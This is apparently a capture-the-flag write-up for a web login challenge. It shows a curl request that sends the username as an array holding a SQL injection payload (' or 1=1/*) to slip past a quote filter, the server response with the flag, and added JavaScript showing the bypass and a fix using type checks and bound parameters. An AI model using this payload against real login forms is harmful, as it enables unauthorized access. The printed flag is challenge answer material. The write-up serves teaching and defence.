Tags: web 

The server calls app.use(bodyParser.urlencoded({ extended: true })), so we can bypass the filter by POSTing an array to the server:

$ curl -X POST -d "username[]=nhienit' or 1=1/*&password=213" "https://missing-flavortext.dicec.tf/login"

<!doctype html>
<html>
    <head>
        <link rel="stylesheet" href="/styles.css">
    </head>
    <body>
        <div>
            <p>Looks like there was no flavortext here either :(</p>
            <p>Here's your flag?</p>
            <p>dice{sq1i_d03sn7_3v3n_3x1s7_4nym0r3}</p>
        </div>
    </body>
</html>
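
Added example, not part of the original writeup or the challenge source: it shows why an array-valued field slips past a quote filter and what a type check plus bound parameters does instead. The filter, the query shape, the table and column names and all function names are assumptions, and parseExtended is a simplified stand-in for the extended urlencoded parser.

```javascript
// Simplified stand-in for the extended (qs-style) urlencoded parser:
// a key written as name[] is collected into an array under "name".
function parseExtended(rawBody) {
  const body = {};
  for (const [key, value] of new URLSearchParams(rawBody)) {
    if (key.endsWith('[]')) {
      const name = key.slice(0, -2);
      if (!Array.isArray(body[name])) body[name] = [];
      body[name].push(value);
    } else {
      body[key] = value;
    }
  }
  return body;
}

// Assumed filter (hypothetical): block any field containing a single quote.
// String.prototype.includes is a substring search, but Array.prototype.includes
// tests whether some element is exactly "'", so a quote inside an element passes.
function naiveFilterBlocks(body) {
  return [body.username, body.password].some((v) => v.includes("'"));
}

// Assumed query construction: interpolation stringifies the array, so the
// quote that the filter never saw ends up inside the SQL text.
function buildQueryUnsafe(body) {
  return `SELECT id FROM users WHERE username = '${body.username}' AND password = '${body.password}'`;
}

// Hardened form: accept only strings, and hand the values to the driver as
// bound parameters instead of building SQL text from them.
function validateStrict(body) {
  for (const field of ['username', 'password']) {
    if (typeof body[field] !== 'string') {
      return { ok: false, reason: `${field} must be a string` };
    }
  }
  return {
    ok: true,
    sql: 'SELECT id FROM users WHERE username = ? AND password = ?',
    params: [body.username, body.password],
  };
}

// Constructed sample: the same body as the curl request above.
const sample = parseExtended("username[]=nhienit' or 1=1/*&password=213");
console.log('filter blocks request:', naiveFilterBlocks(sample));
console.log('query text:', buildQueryUnsafe(sample));
console.log('strict validation:', validateStrict(sample));
```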